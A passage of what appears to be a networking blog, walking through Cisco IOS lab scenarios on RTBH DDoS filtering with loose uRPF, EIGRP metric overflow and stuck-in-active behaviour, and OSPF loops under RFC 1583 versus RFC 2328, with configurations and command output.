Origin IGP, metric 0, localpref 200, valid, internal, best
Community: 12:666
PE2#
PE2#show ip cef 3.3.3.3/32 det
3.3.3.3/32, epoch 0, flags rib only nolabel, rib defined all labels
recursive via 10.0.0.0
attached to Null0
There is an unfortunate side effect though – CE2 has lost connectivity as well:
CE2#ping 3.3.3.3 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
UUUUU
Success rate is 0 percent (0/5)
Destination-based RTBH might be a good tool to limit the impact of DDoS attack to gain additional information about attacker. Let’s assume that CE1 already knows the source IP address – 5.5.5.5/32. Time to introduce source-based RTBH with the addition of loose uRPF!
PE1#show run int f0/0
interface FastEthernet0/0
ip verify unicast source reachable-via any
PE2#show run int f0/0
interface FastEthernet0/0
ip verify unicast source reachable-via any
PE2#show run int f0/1
interface FastEthernet0/1
ip verify unicast source reachable-via any
ISP is set up, so let’s swap the announcements on CE1 to trigger source-based RTBH:
CE1#show run | s ip route|router bgp
router bgp 3
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
network 5.5.5.5 mask 255.255.255.255 route-map RTBH
ip route 5.5.5.5 255.255.255.255 Null0
ISP is filtering the traffic from attacker on the entry points to its network:
PE2#show ip bgp 5.5.5.5/32
BGP routing table entry for 5.5.5.5/32, version 29
Paths: (2 available, best #1, table default)
Advertised to update-groups:
3
Refresh Epoch 3
3
10.0.0.0 from 1.1.1.1 (1.1.1.1)
Origin IGP, metric 0, localpref 200, valid, internal, best
Community: 12:666
Refresh Epoch 4
5
192.168.25.5 from 192.168.25.5 (5.5.5.5)
Origin IGP, metric 0, localpref 100, valid, external
PE2#
PE2#show ip cef 5.5.5.5/32 det
5.5.5.5/32, epoch 0, flags rib only nolabel, rib defined all labels
recursive via 10.0.0.0
attached to Null0
This time, however, only the offending party is neutralized, valid connections are still operational:
CE2#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 44/53/72 ms
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
.....
Success rate is 0 percent (0/5)
In production you would not probably allow customers to announce the prefixes in such a direct way, one would rather restrict the allowed prefixes or even use a dedicated router within ISP to generate the prefixes for RTBH. Nevertheless, the underlying idea of loose uRPF combined with static route to Null0 stays the same, so I hope this post bridges the gap between the uRPF mode and its use case.
Let’s imagine that you’ve got an unstoppable urge to upgrade your network software to the latest available version as well as to adopt all the best practices available (you’re not looking for a new job just yet). Your first Guinea pig is EIGRP in classic mode – you can’t wait to bump it to named mode because of all shiny new features. Even better, you can do it with just a single eigrp upgrade-cli command – couldn’t be easier, what could possibly go wrong? As you might have guessed from my previous posts, such an upgrade could wreck your network in certain circumstances.
What could be simpler than four routers? Exactly, three routers! Each of them is running EIGRP, R1 & R3 – classic mode, while R2 has just finished upgrading to named mode.
R1#show run | section router eigrp|interface
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router eigrp 1
network 0.0.0.0
R3#show run | section router eigrp|interface
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
router eigrp 1
network 0.0.0.0
R2#show run | section router eigrp|interface
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router eigrp NAMED
address-family ipv4 unicast autonomous-system 1
network 0.0.0.0
As you probably expect, there is nothing criminal just yet, R3 is still able to reach R1 without hiccups:
R3#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/158720] via 192.168.23.2, 00:03:32, FastEthernet0/1
2.0.0.0/32 is subnetted, 1 subnets
D 2.2.2.2 [90/28160] via 192.168.23.2, 00:03:37, FastEthernet0/1
D 192.168.12.0/24 [90/30720] via 192.168.23.2, 00:03:37, FastEthernet0/1
R3#
R3#ping 1.1.1.1 source lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/28/36 ms
So far so good, isn’t it? However, just as you preparing to hit upgrade-cli on yet another router, there is a request coming in to deprioritize 1.1.1.1/32 for some kind of traffic engineering. You want it out of your way ASAP, so you adjust the bandwidth on the loopback:
R1(config)# interface lo0
R1(config-if)# bandwidth ?
<1-10000000> Bandwidth in kilobits
inherit Specify how bandwidth is inherited
qos-reference Reference bandwidth for QOS test
receive Specify receive-side bandwidth
R1(config-if)# bandwidth 1
KABOOM! R3 has just lost its connectivity to R1:
R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
UUUUU
Success rate is 0 percent (0/5)
R3#
R3#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/2560133120] via 192.168.23.2, 00:00:56, FastEthernet0/1
2.0.0.0/32 is subnetted, 1 subnets
D 2.2.2.2 [90/28160] via 192.168.23.2, 00:09:42, FastEthernet0/1
D 192.168.12.0/24 [90/30720] via 192.168.23.2, 00:09:42, FastEthernet0/1
EIGRP must be the culprit, however, the route is still in RIB with worse metric as expected.
R3#traceroute 1.1.1.1 source lo0 numeric
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.23.2 12 msec 16 msec 16 msec
2 192.168.23.2 !H !H !H
R2, on the other hand, ignores your efforts to squeeze the traffic through it, because…
R2#show ip route eigrp
<output omitted>
3.0.0.0/32 is subnetted, 1 subnets
D 3.3.3.3 [90/2662400] via 192.168.23.3, 00:14:07, FastEthernet0/1
It has lost the route!
However, the loss is not quite complete as it may look like. The prefix is still in EIGRP topology table with perfectly valid metrics:
R2#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 VR(NAMED) Topology Entry for AS(1)/ID(2.2.2.2) for 1.1.1.1/32
State is Passive, Query origin flag is 1, 0 Successor(s), FD is Infinity, RIB is 4294967295
Descriptor Blocks:
192.168.12.1 (FastEthernet0/0), from 192.168.12.1, Send flag is 0x0
Composite metric is (655694233600/655687680000), route is Internal
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 5100000000 picoseconds
Reliability is 255/255
Load is 1/255
Minimum MTU is 1500
Hop count is 1
Originating router is 1.1.1.1
The data seems to be an order. So far we’ve got two mysteries on our hands:
Why R2 has lost its route?
Why R3 has NOT lost its route?
The first question directly affects availability, so we tackle this one first. Notice anything unusual about EIGRP metrics? It’s way bigger than “RIB is 4294967295” which is the upper bound of 32-bit RIB metrics. EIGRP cannot squeeze its 64-bit wide metric into 32-bit RIB metric, so the route is not installed. Solution? Scale down EIGRP metric before putting it into RIB by using metric rib-scale,which is equal to 128 by default:
R2#show ip protocols
Routing Protocol is "eigrp 1"
Outgoing update filter list for all interfaces is not set
Incoming update filter list for all interfaces is not set
Default networks flagged in outgoing updates
Default networks accepted from incoming updates
EIGRP-IPv4 VR(NAMED) Address-Family Protocol for AS(1)
Metric weight K1=1, K2=0, K3=1, K4=0, K5=0 K6=0
Metric rib-scale 128
Metric version 64bit
NSF-aware route hold timer is 240
Router-ID: 2.2.2.2
Topology : 0 (base)
Active Timer: 3 min
Distance: internal 90 external 170
Maximum path: 4
Maximum hopcount 100
Maximum metric variance 1
Total Prefix Count: 5
Total Redist Count: 0
Automatic Summarization: disabled
Maximum path: 4
Routing for Networks:
0.0.0.0
Routing Information Sources:
Gateway Distance Last Update
192.168.12.1 90 00:17:36
192.168.23.3 90 00:17:36
Distance: internal 90 external 170
Guess what? 128 is still not enough to bring 655694233600 to 32-bit number, 160 seems to do the trick though:
R2(config)#router eigrp NAMED
R2(config-router)#address-family ipv4 autonomous-system 1
R2(config-router-af)#metric rib-scale 160
R2#show ip route eigrp
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
D 1.1.1.1 [90/4098088960] via 192.168.12.1, 00:00:49, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
D 3.3.3.3 [90/2129920] via 192.168.23.3, 00:00:49, FastEthernet0/1
R3 is able to reach 1.1.1.1/32 again as well:
R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/32/52 ms
So, the first mystery is declassified now. What about the second on: why on earth did R3 retain the route after R2 stopped using it? It’s not an idle question though: such a behaviour is bound to confuse troubleshooting engineer, who is led to believe that routing is still intact, since the proper route is installed in RIB.
After EIGRP router loses all of its successor routes, it runs a synchronization algorithm called DUAL. Our case is not an exception, so let’s walk the process between R2 and R3:
R2 loses the successor for 1.1.1.1/32, because it receives Query from R1, so R2 sends the Query of its own towards R3.
Notice the metric: delay corresponds to the actual value on R2 instead of Infinity constant.
R3 updates its topology with the received metric components:
R3#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 Topology Entry for AS(1)/ID(3.3.3.3) for 1.1.1.1/32
State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560133120
Descriptor Blocks:
192.168.23.2 (FastEthernet0/1), from 192.168.23.2, Send flag is 0x0
Composite metric is (2560133120/2560130560), route is Internal
Vector metric:
Minimum bandwidth is 1 Kbit
Total delay is 5200 microseconds
Reliability is 255/255
Load is 1/255
Minimum MTU is 1500
Hop count is 2
Originating router is 1.1.1.1
Since R3 has no alternatives to R2 and thus no possible EIGRP neighbours to query further, it responds back with the Infinity metric due to split horizon rule:
R2 receives all Reply to outstanding Query, so it is able to select the loop-free route. The only available one cannot squeeze into RIB, so R2 is left with no route.
Fun fact: if you flap RIB scale config so that R2 loses the existing route, Query from R2 indicates route loss properly:
The reason for such a different processing seems to be simple: the initial Query is triggered by the Query from successor R1 before RIB update is attempted (no reason to specify Infinity metric); the second Query is performed after proper route loss from RIB perspective. The initial Query cannot trigger RIB update because routing information has to be updated via DUAL first. I reckon there could be two solutions to that:
either send Update with Infinity metric after the route fails to be installed in RIB or
always send Query with Infinity metric (which is the approach in EIGRP RFC).
Is it a likely failure scenario? Not really, modern networks make it difficult to end up with a metric high enough to get an out-of-bounds value. However, it’s still a valid scenario, especially in case of lousy metric engineering. The prevention is well-known – pilot testing and maintenance windows with automated predefined checks.
It’s very likely that you already know what EIGRP stuck-in-active (SIA) feature means. Just a quick recap: if a router does not get a Reply message for previously sent Query within Active timer (3 minutes by default), it tears down the adjacency with the “stuck” neighbour; in the meantime the router probes its neighbours with SIA-Query, resetting Active timer if there is SIA-Reply from the neighbour. Sounds simple, right? Just another failsafe to protect network from a router that might go haywire. Let me ask you a long multi-question though:
Why SIA is required – there is no way to disable it? Isn’t it enough to expire Holddown timer on the stuck neighbour and consider its Reply unnecessary?
Well, the reply really depends on the viewpoint (Cisco’s “it depends”, uh-huh). Let’s see it on an example:
In such a setup there is absolutely no way SIA would be needed. Let’s imagine that R3 stops sending EIGRP packets for some reason and 1.1.1.1/32 on R1 goes down:
R1 would send a Query for 1.1.1.1/32 to R2;
R2 would send a Query for 1.1.1.1/32 to R3, however, it will never get a Reply;
There would be a few unsuccessful EIGRP retransmits from R2 towards R3;
Either Holddown timer expires (15s by default) or number of retransmits reaches 16 (only Cisco knows how long);
R2 tears down neighbourship with R3 and sends Reply back to R1;
Active timer on R1 never comes even close to expiration (3 minutes) so the 1.1.1.1/32 in Active state is removed.
Remember, however, that EIGRP was designed really long time ago – when serial links were ubiquitous. The most important feature of these links for this discussion – relatively long distance and high delay as a result. Although serial links are actively upgraded, there is still a similar connection – radiolinks. Consider the following setup:
The only non-default thing is the serial link using Frame-Relay for encapsulation.
R1#sho run | s interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
ip address 192.168.14.1 255.255.255.0
router eigrp 1
network 0.0.0.0
R2#show run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface Serial4/0
ip address 192.168.23.2 255.255.255.0
encapsulation frame-relay
no keepalive
frame-relay interface-dlci 100
router eigrp 1
network 0.0.0.0
R3#show run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface Serial4/0
ip address 192.168.23.3 255.255.255.0
encapsulation frame-relay
no keepalive
frame-relay interface-dlci 100
router eigrp 1
network 0.0.0.0
Let’s try to run the scenario without SIA involved. The feature was introduced in 12.1(5) release so any 12.0 software should do. Although we cannot drop Queries specifically, we can discard all unicast packets to achieve the following: drop Queries and accept Hello. As a result, R2 would consider R3 to have failed based on Active timer (180 seconds by default) and not on Holddown timer (also 180 seconds by default). Although it seems like a setup at the first glance, I suggest holding on to it for some time.
R3#show ip access-lists
Extended IP access list NOUNICAST
10 permit ip any 224.0.0.0 15.255.255.255
20 deny ip any any
Now, let’s bring down 1.1.1.1/32 and activate the ACL on R3:
R3(config)#interface s4/0
R3(config-if)#ip access-group NOUNICAST in
R1(config)#iinterface lo0
R1(config-if)#sh
Now R1 considers the route to be in Active state.
R1# show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
r - Reply status
A 1.1.1.1/32, 1 successors, FD is Infinity
1 replies, active 00:00:07, query-origin: Local origin
Remaining replies:
via 192.168.12.2, r, FastEthernet0/0
After 3 minutes R1 should flush the route because by that moment it has received no Reply from R2 as there was no response from R3. However, this is not the case:
R1#show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Codes: P - Passive, A - Active, U - Update, Q - Query, R - Reply,
r - Reply status
A 1.1.1.1/32, 1 successors, FD is Inaccessible
1 replies, active 00:03:05, query-origin: Local origin
via Connected (Infinity/Infinity), Loopback0
Remaining replies:
via 192.168.12.2, r, FastEthernet0/0
R1#show ip eigrp topology active
IP-EIGRP Topology Table for AS(1)/ID(1.1.1.1)
Is there anything wrong with the configuration? I don’t think so. However, let’s get back to the failure condition based on Active timer instead of Holddown timer. Imagine that there are a bunch of other routers between R1 and R2, all using serial links and thus contributing to overall delay. May there be just a slight difference between 1.1.1.1/32 going down (and starting Active timer) and last Hello from R3 arriving (refreshing Holddown timer) that is covered completely by that delay? Definitely so:
Although R2 might terminate neighbourship with R3 after 180 seconds, there is still a propagation delay for that event to reach R1.
With a bit of “luck”, last Hello and disapperance of 1.1.1.1/32 would line up.
As soon as R2 prepares the Reply to be sent back to R1, Active timer on R1 expires and R1 resets the neighbourship with R2, at least according to the description of DUAL. As you could imagine, such a behaviour causes chain flapping of EIGRP neighbourships all around the network, just because there are high-delay links and a rogue malfunctioning router.
So why did we filter only unicast packets instead of dropping all EIGRP datagrams? Well, it would have required me to initiate the events at the same time right after last Hello from R3 was received. Although it’s possible with some automation, using Active timer instead removed the delay between my brain and the keyboard completely from equation while still providing us with the same result.
However, that’s not what we received during the test. I’ll have to speculate a little bit here as I don’t have a strict explanation for it, only suggestion.
It’s possible to alleviate the problem by increasing the gap between default values of Active and Holddown timers. However, feasibility of such a method really depends on the total delay between the routers so I’d consider it to be a workaround. It seems that IOS 12.0 implements exactly this behaviour; version 11 could have provided different results but I could not find the image.
The proper solution to the problem at hand is SIA. The idea is simple: separate prefix availability check (Query) from neighbour availability check (SIA-Query). Such an approach incurs no tangible dependency on total delay compared to timer tuning. Besides, it is generally a good idea to separate functions and not to overload them extensively.
Does it really matter in the modern world, especially since SIA cannot be disabled? Most likely not, to be honest, unless you run a very outdated IOS version (SIA would be the least of your concerns in such a case though). Understanding the reason for a feature to be implemented makes me feel good – so maybe such a knowledge would make someone feel good as well.
Lately I’ve covered one of the reasons for RFC 2328 to emerge. However, that’s not the only scenario when OSPF calculations, compliant with RFC 1583, can lead to routing loops. If you’ve peeked at RFC 2178, then you probably know what’s coming next.
Besides fixing the metric for aggregate routes, RFC 2328 also changed the best path selection process for external routes.
Otherwise, compare the cost of this new AS external path to the ones present in the table. Type 1 external paths are always shorter than type 2 external paths. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths are compared by looking at the advertised type 2 metrics, and then if necessary, the distance to the forwarding addresses.
Compare the AS external path described by the LSA with the existing paths in N’s routing table entry, as follows. If the new path is preferred, it replaces the present paths in N’s routing table entry. If the new path is of equal preference, it is added to N’s routing table entry’s list of paths.
(a) Intra-area and inter-area paths are always preferred over AS external paths.
(b) Type 1 external paths are always preferred over type 2 external paths. When all paths are type 2 external paths, the paths with the smallest advertised type 2 metric are always preferred.
(c) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, and RFC1583Compatibility is set to “disabled”, select the preferred paths based on the intra-AS paths to the ASBR/forwarding addresses, as specified in Section 16.4.1.
(d) If the new AS external path is still indistinguishable from the current paths in the N’s routing table entry, select the preferred path based on a least cost comparison. Type 1 external paths are compared by looking at the sum of the distance to the forwarding address and the advertised type 1 metric (X+Y). Type 2 external paths advertising equal type 2 metrics are compared by looking at the distance to the forwarding addresses.
RFC 1583 compares same routes from different ASBR solely based on metric.
RFC 2328 prefers intra-area ASBRs over the rest; if there is a tie, only then it compares the costs to ASBRs.
So the selection decisions of interest are:
intra-area ASBR preference;
no distinction between intra-area backbone and inter-area ASBRs.
Consider the following setup:
The ASBRs peer with BGP node to exchange a few prefixes: receive 1.1.1.1/32 and announce 3.3.3.3/32. ASBRs also announce a default route into OSPF domain. Two links have non-default costs, they are marked in red. Apart from that, no special configuration is present, everything is left by default.
ASBR1#sho run | s interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.23.2 255.255.255.0
ip ospf 1 area 0
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.12.2 255.255.255.0
router ospf 1
default-information originate always
router bgp 100
no bgp default ipv4-unicast
neighbor 192.168.12.1 remote-as 1
!
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.12.1 activate
ASBR2#sho run | section interface|router
interface Loopback0
ip address 6.6.6.6 255.255.255.255
ip ospf 1 area 1
interface FastEthernet0/0
ip address 192.168.16.6 255.255.255.0
interface FastEthernet0/1
ip address 192.168.56.6 255.255.255.0
ip ospf 1 area 1
interface FastEthernet1/0
ip address 192.168.46.6 255.255.255.0
ip ospf 1 area 1
ip ospf cost 100
router ospf 1
default-information originate always
router bgp 100
no bgp default ipv4-unicast
neighbor 192.168.16.1 remote-as 1
!
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.16.1 activate
ABR1#sho run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.45.4 255.255.255.0
ip ospf 1 area 0
interface FastEthernet0/1
ip address 192.168.34.4 255.255.255.0
ip ospf 1 area 0
interface FastEthernet1/0
ip address 192.168.46.4 255.255.255.0
ip ospf 1 area 1
ip ospf cost 100
router ospf 1
ABR2#sho run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
ip ospf 1 area 0
interface FastEthernet0/1
ip address 192.168.56.5 255.255.255.0
ip ospf 1 area 1
router ospf 1
R#sho run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.23.3 255.255.255.0
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.34.3 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
Obviously, the configuration is pretty innocent, BGP should be able to reach out to 3.3.3.3/32 by using 1.1.1.1 as a source address.
BGP#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
.....
Success rate is 0 percent (0/5)
However, that’s not the case. Maybe some routes are missing along the way?
BGP#traceroute 3.3.3.3 source 1.1.1.1
Type escape sequence to abort.
Tracing the route to 3.3.3.3
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.16.6 12 msec 24 msec 20 msec
2 192.168.56.5 56 msec 16 msec 36 msec
3 * * *
<output omitted>
It seems that ABR1 is dropping the packets. However, that’s not really the case if one runs a traceroute from R:
R#traceroute 1.1.1.1 source 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.4 16 msec 16 msec 20 msec
2 192.168.34.3 20 msec 24 msec 16 msec
3 192.168.34.4 32 msec 36 msec 40 msec
4 192.168.34.3 36 msec 40 msec 36 msec
<you get the idea>
According to the topology, R selects a proper default route towards ASBR2:
R#sho ip ospf border-routers
OSPF Router with ID (3.3.3.3) (Process ID 1)
Base Topology (MTID 0)
Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route
i 4.4.4.4 [1] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 5.5.5.5 [2] via 192.168.34.4, FastEthernet0/1, ABR, Area 0, SPF 12
i 2.2.2.2 [10] via 192.168.23.2, FastEthernet0/0, ASBR, Area 0, SPF 12
I 6.6.6.6 [3] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
I 6.6.6.6 [101] via 192.168.34.4, FastEthernet0/1, ASBR, Area 0, SPF 12
ABR1, though, goes haywire:
ABR1#sho ip ospf border-routers
OSPF Router with ID (4.4.4.4) (Process ID 1)
Base Topology (MTID 0)
Internal Router Routing Table
Codes: i - Intra-area route, I - Inter-area route
i 5.5.5.5 [101] via 192.168.46.6, FastEthernet1/0, ABR, Area 1, SPF 8
i 5.5.5.5 [1] via 192.168.45.5, FastEthernet0/0, ABR, Area 0, SPF 9
i 2.2.2.2 [11] via 192.168.34.3, FastEthernet0/1, ASBR, Area 0, SPF 9
i 6.6.6.6 [100] via 192.168.46.6, FastEthernet1/0, ASBR, Area 1, SPF 8
Take a very close look at the cost towards ASBR2 from both points of view. R selects the path via ABR2 with the cost of 3; however, ABR1 knows nothing about path through ABR2 and sees only the cost of 101. The reason for such a behavour is relatively simple: ASBR2 and ABR1 are in the same area so ABR1 prefers intra-area route. As a consequence, the preference for ASBR is yet again changed for transit packet that results in a routing loop.
Let’s switch over to RFC 2328 on all the routers in the domain:
R#traceroute 1.1.1.1 so 3.3.3.3
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.4 20 msec 32 msec 12 msec
2 192.168.46.6 12 msec 20 msec 8 msec
3 192.168.16.1 4 msec 28 msec 16 msec
ABR1#sho ip ro os
<output omitted>
Gateway of last resort is 192.168.46.6 to network 0.0.0.0
O*E2 0.0.0.0/0 [110/1] via 192.168.46.6, 00:02:00, FastEthernet0/1
<output omitted>
Although the loop is defeated at last, we still face suboptimal routing. R still considers routes towards ASBR1 (backbone intra-area) and ASBR2 (inter-area) to be equal so it proceeds to comparing the costs. Wouldn’t it be better to just prefer backbone route over inter-area? This was exactly the idea in RFC 2178:
Intra-area paths using non-backbone areas are always the most preferred.
Otherwise, intra-area backbone paths are preferred.
However, there was a strong reason to move away to the current selection process:
There is still the possibility of a routing loop in RFC 2178 when both
virtual links are in use and
the same external route is being imported by multiple ASBRs, each of which is in a separate area.
To fix this problem, Section 16.4.1 has been revised. To choose the correct ASBR/forwarding address, intra-area paths through non-backbone areas are always preferred. However, intra-area paths through the backbone area (Area 0) and inter-area paths are now of equal preference, and must be compared solely based on cost.
The reasoning behind this change is as follows. When virtual links are in use, an intra-area backbone path for one router can turn into an inter-area path in a router several hops closer to the destination. Hence, intra-area backbone paths and inter-area paths must be of equal preference. We can safely compare their costs, preferring the path with the smallest cost, due to the calculations in Section 16.3.
As far as I know, there is no support specifically for RFC 2178 among relevant OSPF implementations. Luckily, vivid imagination helps in such cases. Consider the following topology:
RFC 2178 compliance:
R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 (via virtual-link).
Backbone ASBR2 is better so R1 sends a packet to it.
R2 compares inter-area ASBR1 and ASBR2.
ASBR1 is better, so R2 sends packet to it – back to R1.
RFC 2328 compliance:
R1 compares the inter-area ASBR1 with the intra-area backbone ASBR2 and considers them equal.
R1 compares costs towards ASBR1 (2) and ASBR2 (13).
ASBR1 is better so R1 sends a packet to it via ABR2.
The source of evil for external routes in OSPF – change of ASBR preference along the path. RFC 2328 eliminates such changes at last, although at the cost of optimal routing. However, RFC authors reckon that inefficient path is usually better than a completely broken one.
OSPF is a rather rigid IGP with a lot of inner complexities. Although it’s possible to tune this protocol to some extent, one should have a very deep understanding of repercussions to avoid sophisticated troubleshooting. In the end, KISS is very much applicable to OSPF. If you require a more flexible protocol, the choice is obvious: either you need BGP or a better network architect.
There are quite a few versions of OSPF out there in the wild. However, it might be uncommon knowledge that several RFCs exist just for OSPFv2, although most implementations conform either to RFC 1583 or RFC 2328. The aforementioned RFCs are not compatible so there is even an article that describes vividly the mayhem different versions could cause in a network. So why did IETF bothered to create second subversion of the protocol? Reason in simple: RFC 1583 contains inherent flaws in the algorithm that could cause loops in the network.
One of the significant differences between two versions is how ABR calculate metric for aggregated routes.
When the range’s status indicates Advertise, a Type 3 advertisement is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix F for details) and cost equal to the smallest cost of any of the component networks.
When the range’s status indicates Advertise, a Type 3 summary-LSA is generated with Link State ID equal to the range’s address (if necessary, the Link State ID can also have one or more of the range’s “host” bits set; see Appendix E for details) and cost equal to the largest cost of any of the component networks.
For a very long time this change seemed to me like a forklift update for the better good cause whatever. However, there is a pretty good section in RFC 2178 about the true reasons for such a drastic change:
There are two manifestations of this problem. The first, discovered by Dennis Ferguson, occurs when an aggregated forwarding address is in use. In this case, the desirability of the forwarding address can change for the worse as a packet crosses an area aggregation boundary on the way to the forwarding address, which in turn can cause the preference of AS-external-LSAs to change, resulting in a routing loop.
Feels cryptic? Welcome to the club. Let’s build up a scenario that illustrates the problem.
Areas 1 and 2 include external interfaces into OSPF in order to populate Forwarding Address field. ABRs would summarize these ranges into area 0. Let’s recap on the process of path selection for external routes in RFC 1583:
intra-AS paths are better than external paths;
Type-1 (E1) paths are better than Type-2 (E2) paths;
Lower metric wins;
E2 only: lower metric towards Forwarding Address wins;
Here’s the config for all routers in this setup:
R1#show run | section interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
interface FastEthernet0/1
ip address 192.168.13.1 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ABR1#sho run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.24.2 255.255.255.0
ip ospf 1 area 1
router ospf 1
area 1 range 10.1.0.0 255.255.0.0
network 0.0.0.0 255.255.255.255 area 0
ABR2#sho run | section interface|router
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.35.3 255.255.255.0
ip ospf 1 area 2
interface FastEthernet0/1
ip address 192.168.13.3 255.255.255.0
router ospf 1
area 2 range 10.2.0.0 255.255.0.0
network 0.0.0.0 255.255.255.255 area 0
ASBR1#sho run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 10.1.46.4 255.255.255.0
ip ospf cost 1000
interface FastEthernet0/1
ip address 192.168.24.4 255.255.255.0
router ospf 1
router-id 4.4.4.4
redistribute bgp 1 subnets
network 0.0.0.0 255.255.255.255 area 1
router bgp 1
bgp router-id 4.4.4.4
no bgp default ipv4-unicast
neighbor 10.1.46.6 remote-as 6
!
address-family ipv4
redistribute ospf 1
neighbor 10.1.46.6 activate
ASBR2#sho run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.35.5 255.255.255.0
interface FastEthernet0/1
ip address 10.2.56.5 255.255.255.0
ip ospf cost 10
router ospf 1
router-id 5.5.5.5
redistribute bgp 1 subnets
network 0.0.0.0 255.255.255.255 area 2
router bgp 1
bgp router-id 5.5.5.5
no bgp default ipv4-unicast
neighbor 10.2.56.6 remote-as 6
!
address-family ipv4
redistribute ospf 1
neighbor 10.2.56.6 activate
BGP#sho run | s interface|router
interface Loopback0
ip address 6.6.6.6 255.255.255.255
interface FastEthernet0/0
ip address 10.1.46.6 255.255.255.0
interface FastEthernet0/1
ip address 10.2.56.6 255.255.255.0
router bgp 6
no bgp default ipv4-unicast
neighbor 10.1.46.4 remote-as 1
neighbor 10.2.56.5 remote-as 1
!
address-family ipv4
network 6.6.6.6 mask 255.255.255.255
neighbor 10.1.46.4 activate
neighbor 10.2.56.5 activate
Let’s verify that R1 has connectivity to R6:
R1#sho ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 12
Last update from 192.168.12.2 on FastEthernet0/0, 00:04:10 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 4.4.4.4, 00:04:13 ago, via FastEthernet0/0
